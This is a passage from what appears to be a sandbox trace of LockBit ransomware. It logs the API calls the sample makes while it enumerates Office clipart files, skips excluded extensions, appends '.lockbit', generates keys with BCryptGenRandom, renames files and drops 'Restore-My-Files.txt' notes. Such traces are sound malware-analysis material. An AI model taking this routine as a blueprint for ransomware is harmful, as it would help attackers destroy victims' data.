(lpString1=".rar", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.261] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.261] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.262] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.262] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.262] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.262] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.262] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.lockbit") returned 68 [0109.262] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boat.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.263] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.263] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.263] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3350) returned 1 [0109.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.264] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.264] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.270] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.270] malloc (_Size=0x9e) returned 0x2073f40 [0109.270] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x2073f40, Length=0x9e, FileInformationClass=0xa) returned 0xc0000008 [0109.270] free (_Block=0x2073f40) [0109.270] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOAT.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.270] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.270] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ce30000, ftCreationTime.dwHighDateTime=0x1bd78be, ftLastAccessTime.dwLowDateTime=0x51a15810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1ce30000, ftLastWriteTime.dwHighDateTime=0x1bd78be, nFileSizeHigh=0x0, nFileSizeLow=0x714c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOATINST.WMF", cAlternateFileName="")) returned 1 [0109.270] lstrcmpiW (lpString1=".", lpString2="BOATINST.WMF") returned -1 [0109.270] lstrcmpiW (lpString1="..", lpString2="BOATINST.WMF") returned -1 [0109.271] PathFindExtensionW (pszPath="BOATINST.WMF") returned=".WMF" [0109.271] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.271] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.271] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BOATINST.WMF") returned 1 [0109.272] lstrcmpiW (lpString1="ntldr", lpString2="BOATINST.WMF") returned 1 [0109.272] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BOATINST.WMF") returned 1 [0109.272] lstrcmpiW (lpString1="bootsect.bak", lpString2="BOATINST.WMF") returned 1 [0109.272] lstrcmpiW (lpString1="autorun.inf", lpString2="BOATINST.WMF") returned -1 [0109.272] lstrcmpiW (lpString1="thumbs.db", lpString2="BOATINST.WMF") returned 1 [0109.272] lstrcmpiW (lpString1="iconcache.db", lpString2="BOATINST.WMF") returned 1 [0109.272] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.272] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF") returned=".WMF" [0109.272] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.272] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.272] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.273] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.273] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.lockbit") returned 72 [0109.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\boatinst.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.274] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.274] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.274] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29004) returned 1 [0109.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.274] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.274] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.275] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.275] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.279] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.279] malloc (_Size=0xa6) returned 0x77d800 [0109.279] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.281] free (_Block=0x77d800) [0109.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BOATINST.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.282] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.282] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77641800, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77641800, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00076_.WMF", cAlternateFileName="")) returned 1 [0109.282] lstrcmpiW (lpString1=".", lpString2="BS00076_.WMF") returned -1 [0109.282] lstrcmpiW (lpString1="..", lpString2="BS00076_.WMF") returned -1 [0109.282] PathFindExtensionW (pszPath="BS00076_.WMF") returned=".WMF" [0109.282] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.282] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.283] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.283] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00076_.WMF") returned 1 [0109.284] lstrcmpiW (lpString1="ntldr", lpString2="BS00076_.WMF") returned 1 [0109.284] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00076_.WMF") returned 1 [0109.284] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00076_.WMF") returned -1 [0109.284] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00076_.WMF") returned -1 [0109.284] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00076_.WMF") returned 1 [0109.284] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00076_.WMF") returned 1 [0109.284] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.284] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF") returned=".WMF" [0109.284] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.284] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.284] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.285] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.285] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.lockbit") returned 72 [0109.285] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00076_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.286] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.286] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.286] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1330) returned 1 [0109.286] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.287] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.287] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.287] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.296] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.296] malloc (_Size=0xa6) returned 0x77d800 [0109.296] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0109.296] free (_Block=0x77d800) [0109.296] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00076_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.296] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.296] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfadcd00, ftCreationTime.dwHighDateTime=0x1bd4b2a, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfadcd00, ftLastWriteTime.dwHighDateTime=0x1bd4b2a, nFileSizeHigh=0x0, nFileSizeLow=0x5a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00078_.WMF", cAlternateFileName="")) returned 1 [0109.296] lstrcmpiW (lpString1=".", lpString2="BS00078_.WMF") returned -1 [0109.296] lstrcmpiW (lpString1="..", lpString2="BS00078_.WMF") returned -1 [0109.297] PathFindExtensionW (pszPath="BS00078_.WMF") returned=".WMF" [0109.297] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.297] lstrcmpiW (lpString1=".adv", 